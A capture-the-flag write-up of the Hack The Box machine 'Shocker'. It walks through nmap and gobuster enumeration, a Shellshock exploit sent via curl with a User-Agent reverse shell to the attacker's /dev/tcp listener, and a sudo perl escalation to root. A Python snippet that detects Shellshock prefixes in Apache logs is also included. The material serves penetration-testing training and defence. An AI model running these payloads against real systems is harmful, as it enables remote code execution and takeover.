Write-Up: HTB Shocker

kali@kali:~/development/Mercon$ ./mercon.py -t shocker -i 10.10.10.56 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-06 12:04 EST
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds

[+] Gobuster Running
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/11/06 12:04:43 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/11/06 12:07:30 Finished
===============================================================
kali@kali:~/htb/shocker$ gobuster dir -x txt,php,html -u 10.10.10.56 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2020/11/06 12:25:21 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/11/06 12:26:13 Finished
===============================================================
kali@kali:~/htb/shocker$ gobuster dir -x txt,py,pl,sh,php -u 10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: py,pl,sh,php,txt
[+] Timeout: 10s
===============================================================
2020/11/06 12:34:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.pl (Status: 403)
/.hta.sh (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.pl (Status: 403)
/.htaccess.sh (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.pl (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/11/06 12:35:18 Finished
===============================================================
kali@kali:~/htb/shocker$ cat user.sh 
Content-Type: text/plain

Just an uptime test script

12:37:17 up 37 min, 0 users, load average: 0.03, 0.16, 0.17

Searching for CGI script exploits leads to Shellshock: a vulnerable bash parses an exported environment variable that begins with a function definition and executes whatever follows it, and a CGI handler exports request headers such as User-Agent as environment variables. The payload prefix is:
() { :;};
kali@kali:~/htb/shocker$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.23/4444 0>&1' http://10.10.10.56/cgi-bin/user.sh
kali@kali:~/htb/shocker$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.56 54592
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$
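As an added detection example (not part of the write-up), the Python below parses constructed Apache combined-format log lines and flags requests whose User-Agent or Referer begins with the `() {` function-definition prefix used above; the sample lines, the `parse_line`/`find_shellshock` names and the `/cgi-bin/` heuristic are my assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache "combined" log format (not taken from the box).
# Line 2 carries the write-up's User-Agent payload; line 3 puts a probe in Referer.
SAMPLE_LOG = """\
10.10.14.23 - - [06/Nov/2020:12:37:17 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 112 "-" "curl/7.72.0"
10.10.14.23 - - [06/Nov/2020:12:40:02 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"
10.10.14.23 - - [06/Nov/2020:12:41:10 -0500] "GET /index.html HTTP/1.1" 200 137 "() { :;}; echo probe" "Mozilla/5.0"
10.10.14.23 - - [06/Nov/2020:12:42:00 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 112 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock trigger: a header value that starts with a bash function definition
# "() {". A vulnerable bash parses it (and runs what follows) when the CGI handler
# exports the header as an environment variable such as HTTP_USER_AGENT.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """Return one record per request whose Referer or User-Agent carries a Shellshock prefix."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        parts = entry["req"].split()
        path = parts[1] if len(parts) > 1 else entry["req"]
        for field in ("referer", "ua"):  # headers CGI exports as HTTP_REFERER / HTTP_USER_AGENT
            if SHELLSHOCK_RE.search(entry[field]):
                hits.append({
                    "ip": entry["ip"],
                    "ts": entry["ts"],
                    "path": path,
                    "field": field,
                    "payload": entry[field],
                    "cgi": path.startswith("/cgi-bin/"),  # CGI path: the payload likely reached bash
                })
                break  # one record per request, even if both headers match
    return hits
```

Only requests that hit a CGI script are likely to have executed; the others are still worth keeping as scanner indicators.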
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
